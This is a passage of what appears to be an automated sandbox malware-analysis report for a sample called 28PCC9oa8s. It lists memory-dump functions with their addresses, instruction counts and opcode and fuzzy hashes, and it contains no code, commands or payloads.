                                                            • Opcode Fuzzy Hash: 1da380caf5b8725b2480149ff4452fc26e3baeb90d51e634a1a869277ff6d14a
                                                            • Instruction Fuzzy Hash: 862126F354C321BD7BD2918507906FA2B3FA9DA2383318526F887EA902E395DB4541F1
                                                            Function 06DA0C40 Relevance: 1.4, Strings: 1, Instructions: 125COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 0ee55961caa6685f05dadd5101ea675e8c83331ce4a0a0ce682d642622419c22
                                                            • Instruction ID: 7a0b0090963b921f121e5231d2b8ed887117eaa5d2a8e97f102dbdd7ac027cbd
                                                            • Opcode Fuzzy Hash: 0ee55961caa6685f05dadd5101ea675e8c83331ce4a0a0ce682d642622419c22
                                                            • Instruction Fuzzy Hash: 152149F304C320FD7BD2954147906FA2B7BA9DB3383314415F88BD6902D255DB4681F1
                                                            Function 06DA0C8F Relevance: 1.4, Strings: 1, Instructions: 102COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 8a0c3d23785f926ffb916ce27d6c5abbcf01e6c7a8ec5e3069765531b4b03c60
                                                            • Instruction ID: 03793c6280846d0b86c1d481723a8321eb30c272e612ebf620167a100bf25ad7
                                                            • Opcode Fuzzy Hash: 8a0c3d23785f926ffb916ce27d6c5abbcf01e6c7a8ec5e3069765531b4b03c60
                                                            • Instruction Fuzzy Hash: B92108B754C311EEBBD1955107506FA377AE6DA3387308429F887D6901D264DE4591F0
                                                            Function 06DA0C81 Relevance: 1.3, Strings: 1, Instructions: 93COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: 379110747452168511f49b84b801d06e0264c1815bf52194948f35ac677aff2e
                                                            • Instruction ID: 06b2293c33efc7dc8856731a0bc603b0e0f1937fff2f0a78631b2a5b873fb1c7
                                                            • Opcode Fuzzy Hash: 379110747452168511f49b84b801d06e0264c1815bf52194948f35ac677aff2e
                                                            • Instruction Fuzzy Hash: 531123F754C311FD7B8291410B40AFE2A3EE6DA3387308826F88BE6901D264EF4991F1
                                                            Function 06DA0CB6 Relevance: 1.3, Strings: 1, Instructions: 86COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: PR
                                                            • API String ID: 0-2421912052
                                                            • Opcode ID: b2f39421295418cd9f36c5f3b1f2743f4557b54c8ac7bf098b809ed56cb92be2
                                                            • Instruction ID: e6704f2275dd77764c7e8f07c9e68e29b66b8b31d85a7ac2cec2f300767a9e25
                                                            • Opcode Fuzzy Hash: b2f39421295418cd9f36c5f3b1f2743f4557b54c8ac7bf098b809ed56cb92be2
                                                            • Instruction Fuzzy Hash: 9111E5F754D311FD7B8191411B10BFA267EE6DA3387308826F88BE6901E2A5EF4591F1
                                                            Function 06DA0D38 Relevance: .1, Instructions: 87COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5505336984b7db52214ff6f53ae33ff0c2edacae85897117f40d864e0fefbf06
                                                            • Instruction ID: 5a5cb0458910321bd70c6450a0c0deb9f7b85c39dbfa5996698c19848e52c608
                                                            • Opcode Fuzzy Hash: 5505336984b7db52214ff6f53ae33ff0c2edacae85897117f40d864e0fefbf06
                                                            • Instruction Fuzzy Hash: E71127BB50D341ADBB8192504A14BFE2B3AE6C97387314816E886E6842E251EF4581F1
                                                            Function 06DA0CDE Relevance: .1, Instructions: 78COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 90dbfe8eed256d883f951570f410f9fcea5f4628cdc9746cc8033dcdfea5ec3e
                                                            • Instruction ID: 3036ec60efb5ad9cf3cca48113baaa8ed48862f5749dbc3903b05e4d6f517f69
                                                            • Opcode Fuzzy Hash: 90dbfe8eed256d883f951570f410f9fcea5f4628cdc9746cc8033dcdfea5ec3e
                                                            • Instruction Fuzzy Hash: 081148B700D351AEFF8292104A10AFE2B3DD6C9338730482AF887E6842D255AF4581F1
                                                            Function 06DA0D0E Relevance: .1, Instructions: 64COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6e0c1304972a5ec8167f381a87daf5fc76fe55828363b86fff6c9c1991bcf1a1
                                                            • Instruction ID: e8ff1d4263ad0f26cffec127f77c91cb505680db1040b42cb5de8e91622c893c
                                                            • Opcode Fuzzy Hash: 6e0c1304972a5ec8167f381a87daf5fc76fe55828363b86fff6c9c1991bcf1a1
                                                            • Instruction Fuzzy Hash: 3CF0D1F750D311BC7BC291011A00BFA263ED6D9338731882AF887E1802E255AF0590F1
                                                            Function 06E50179 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714557869.0000000006E50000.00000040.00001000.00020000.00000000.sdmp, Offset: 06E50000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6e50000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 1dd62e9f189bbaeb9df3642a92c65337d5ac63925915b545e84ecef286c05c08
                                                            • Instruction ID: 11d6d5729164299705962380e1cf4331e4bf24d2fec5818e1099aea5f2bced12
                                                            • Opcode Fuzzy Hash: 1dd62e9f189bbaeb9df3642a92c65337d5ac63925915b545e84ecef286c05c08
                                                            • Instruction Fuzzy Hash: 4BF08CEF28C2287DB18196822B159FAAF6EF5D3774331982BF802C0906D3960B4D2072

                                                            Non-executed Functions

                                                            Function 06DA0142 Relevance: .2, Instructions: 203COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3f2de90a3ea057a751f51bb6bd91a536457333ec6ea7c9e47be3793214e5cc4d
                                                            • Instruction ID: 71ceb9e901f545e6df5e895cf0f295f0365539f058c5be4e50cb554e626d65a3
                                                            • Opcode Fuzzy Hash: 3f2de90a3ea057a751f51bb6bd91a536457333ec6ea7c9e47be3793214e5cc4d
                                                            • Instruction Fuzzy Hash: 474125F614C311BEB3E2D9554A90AF66B7DE6C727C330482AF4C7CA642E2948E4A41F1
                                                            Function 06DA0123 Relevance: .2, Instructions: 186COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 00000000.00000002.1714206115.0000000006DA0000.00000040.00001000.00020000.00000000.sdmp, Offset: 06DA0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_0_2_6da0000_28PCC9oa8s.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6fed43a39f6cae44612eb375f4524a7ec98e87e494c68a8fdb37073dc55a3aff
                                                            • Instruction ID: 11c3ab67975484143e055c24fe3f6ba7b254325bcbe6bf330f80322da2151593
                                                            • Opcode Fuzzy Hash: 6fed43a39f6cae44612eb375f4524a7ec98e87e494c68a8fdb37073dc55a3aff
                                                            • Instruction Fuzzy Hash: DD4125F614C310BEB3E284455A94AF66B7DE7C7638330482AF4C7CA642E288CE4A41F1